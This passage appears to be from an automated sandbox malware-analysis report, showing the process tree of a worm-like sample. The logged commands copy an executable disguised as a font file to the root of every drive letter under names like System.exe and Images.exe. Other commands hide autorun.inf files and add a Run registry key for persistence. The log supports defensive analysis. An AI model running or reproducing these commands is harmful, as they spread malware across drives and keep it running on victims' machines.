        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Images.exe /y
        5⤵
        
        PID:3052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Images.exe /y
        5⤵
        
        PID:1692
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Images.exe /y
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Images.exe /y
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Images.exe /y
        5⤵
        
        PID:1648
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Images.exe /y
        5⤵
        
        PID:1916
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Images.exe /y
        5⤵
        
        PID:2784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Images.exe /y
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Images.exe /y
        5⤵
        
        PID:2692
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Images.exe /y
        5⤵
        
        PID:2912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Images.exe /y
        5⤵
        
        PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Images.exe /y
        5⤵
        
        PID:2940
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Images.exe /y
        5⤵
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Images.exe /y
        5⤵
        
        PID:3048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Images.exe /y
        5⤵
        
        PID:2244
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\System.exe /y
        5⤵
        
        PID:2884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\System.exe /y
        5⤵
        
        PID:616
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\System.exe /y
        5⤵
        
        PID:2228
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\System.exe /y
        5⤵
        
        PID:2128
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\System.exe /y
        5⤵
        
        PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\System.exe /y
        5⤵
        
        PID:2140
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\System.exe /y
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\System.exe /y
        5⤵
        
        PID:1640
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\System.exe /y
        5⤵
        
        PID:2700
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\System.exe /y
        5⤵
        
        PID:2748
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\System.exe /y
        5⤵
        
        PID:2444
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\System.exe /y
        5⤵
        
        PID:568
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\System.exe /y
        5⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\System.exe /y
        5⤵
        
        PID:2412
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\System.exe /y
        5⤵
        
        PID:1872
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\System.exe /y
        5⤵
        
        PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\System.exe /y
        5⤵
        
        PID:1052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\System.exe /y
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\System.exe /y
        5⤵
        
        PID:2460
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\System.exe /y
        5⤵
        
        PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\System.exe /y
        5⤵
        
        PID:2204
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\System.exe /y
        5⤵
        
        PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\System.exe /y
        5⤵
        
        PID:2216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\System.exe /y
        5⤵
        
        PID:2400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\vaillo.exe /y
        5⤵
        
        PID:1732
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\vaillo.exe /y
        5⤵
        
        PID:2496
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\vaillo.exe /y
        5⤵
        
        PID:2492
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\vaillo.exe /y
        5⤵
        
        PID:2120
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\vaillo.exe /y
        5⤵
        
        PID:1752
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\vaillo.exe /y
        5⤵
        
        PID:1488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\vaillo.exe /y
        5⤵
        
        PID:600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\vaillo.exe /y
        5⤵
        
        PID:1876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\vaillo.exe /y
        5⤵
        
        PID:448
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\vaillo.exe /y
        5⤵
        
        PID:2488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\vaillo.exe /y
        5⤵
        
        PID:2484
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\vaillo.exe /y
        5⤵
        
        PID:2144
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\vaillo.exe /y
        5⤵
        
        PID:2544
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\vaillo.exe /y
        5⤵
        
        PID:2464
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\vaillo.exe /y
        5⤵
        
        PID:108
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\vaillo.exe /y
        5⤵
        
        PID:696
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\vaillo.exe /y
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:832
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\vaillo.exe /y
        5⤵
        
        PID:1196
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\vaillo.exe /y
        5⤵
        
        PID:1328
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\vaillo.exe /y
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\vaillo.exe /y
        5⤵
        
        PID:1380
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\vaillo.exe /y
        5⤵
        
        PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\vaillo.exe /y
        5⤵
        
        PID:2792
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\vaillo.exe /y
        5⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Sounds.exe /y
        5⤵
        
        PID:876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Sounds.exe /y
        5⤵
        
        PID:1804
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Sounds.exe /y
        5⤵
        
        PID:988
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Sounds.exe /y
        5⤵
        
        PID:564
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Sounds.exe /y
        5⤵
        
        PID:1444
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Sounds.exe /y
        5⤵
        
        PID:1708
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Sounds.exe /y
        5⤵
        
        PID:2392
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Sounds.exe /y
        5⤵
        
        PID:1312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Sounds.exe /y
        5⤵
        
        PID:1504
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Sounds.exe /y
        5⤵
        
        PID:1792
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Sounds.exe /y
        5⤵
        
        PID:1228
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Sounds.exe /y
        5⤵
        
        PID:1480
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Sounds.exe /y
        5⤵
        
        PID:1884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Sounds.exe /y
        5⤵
        
        PID:1672
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Sounds.exe /y
        5⤵
        
        PID:1680
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Sounds.exe /y
        5⤵
        
        PID:1676
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Sounds.exe /y
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Sounds.exe /y
        5⤵
        
        PID:1448
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Sounds.exe /y
        5⤵
        
        PID:1696
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Sounds.exe /y
        5⤵
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Sounds.exe /y
        5⤵
        
        PID:2208
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Sounds.exe /y
        5⤵
        
        PID:1688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Sounds.exe /y
        5⤵
        
        PID:1224
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Sounds.exe /y
        5⤵
        
        PID:1984
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Images.exe /y
        5⤵
        
        PID:2472
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Images.exe /y
        5⤵
        
        PID:2148
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Images.exe /y
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Images.exe /y
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Images.exe /y
        5⤵
        
        PID:1920
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Images.exe /y
        5⤵
        
        PID:1684
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Images.exe /y
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Images.exe /y
        5⤵
        
        PID:1324
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Images.exe /y
        5⤵
        
        PID:1424
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Images.exe /y
        5⤵
        
        PID:2964
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Images.exe /y
        5⤵
        
        PID:1376
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Images.exe /y
        5⤵
        
        PID:1252
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Images.exe /y
        5⤵
        
        PID:2280
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Images.exe /y
        5⤵
        
        PID:1988
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Images.exe /y
        5⤵
        
        PID:1888
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Images.exe /y
        5⤵
        
        PID:3012
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Images.exe /y
        5⤵
        
        PID:836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Images.exe /y
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:396
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Images.exe /y
        5⤵
        
        PID:2124
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Images.exe /y
        5⤵
        
        PID:764
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Images.exe /y
        5⤵
        
        PID:1440
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Images.exe /y
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Images.exe /y
        5⤵
        
        PID:2052
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Images.exe /y
        5⤵
        
        PID:896
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul attrib +r +h +s c:\autorun.inf
        5⤵
        
        PID:2308
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s c:\autorun.inf
        6⤵
        Sets file to hidden
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:2068
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul attrib +r +h +s d:\autorun.inf
        5⤵
        
        PID:3024
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul attrib +r +h +s e:\autorun.inf
        5⤵
        
        PID:292
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul attrib +r +h +s f:\autorun.inf
        5⤵
        
        PID:1848
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s f:\autorun.inf
        6⤵
        Sets file to hidden
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:2740
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul attrib +r +h +s g:\autorun.inf
        5⤵
        
        PID:1656
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul attrib +r +h +s h:\autorun.inf
        5⤵
        
        PID:1548
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul attrib +r +h +s i:\autorun.inf
        5⤵
        
        PID:2736
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul attrib +r +h +s j:\autorun.inf
        5⤵
        
        PID:1552
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul attrib +r +h +s k:\autorun.inf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul attrib +r +h +s l:\autorun.inf
        5⤵
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul attrib +r +h +s m:\autorun.inf
        5⤵
        
        PID:2972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul attrib +r +h +s n:\autorun.inf
        5⤵
        
        PID:1756
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul attrib +r +h +s o:\autorun.inf
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul attrib +r +h +s p:\autorun.inf
        5⤵
        
        PID:2864
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul attrib +r +h +s q:\autorun.inf
        5⤵
        
        PID:2744
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul attrib +r +h +s r:\autorun.inf
        5⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul attrib +r +h +s s:\autorun.inf
        5⤵
        
        PID:2836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul attrib +r +h +s t:\autorun.inf
        5⤵
        
        PID:2900
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul attrib +r +h +s u:\autorun.inf
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul attrib +r +h +s v:\autorun.inf
        5⤵
        
        PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul attrib +r +h +s w:\autorun.inf
        5⤵
        
        PID:2968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul attrib +r +h +s x:\autorun.inf
        5⤵
        
        PID:2612
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul attrib +r +h +s y:\autorun.inf
        5⤵
        
        PID:2752
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul attrib +r +h +s z:\autorun.inf
        5⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mt /t REG_SZ /d C:\Windows\system32\vaillo.exe /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2780
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Sounds
        5⤵
        
        PID:2952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Sounds
        5⤵
        
        PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Sounds
        5⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Sounds
        5⤵
        
        PID:1904
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Sounds
        5⤵
        
        PID:2620
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Sounds
        5⤵
        
        PID:2584
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Sounds
        5⤵
        
        PID:2712
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Sounds
        5⤵
        
        PID:2648
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Sounds
        5⤵
        
        PID:2592
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Sounds
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Sounds
        5⤵
        
        PID:2604
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Sounds
        5⤵
        
        PID:1740
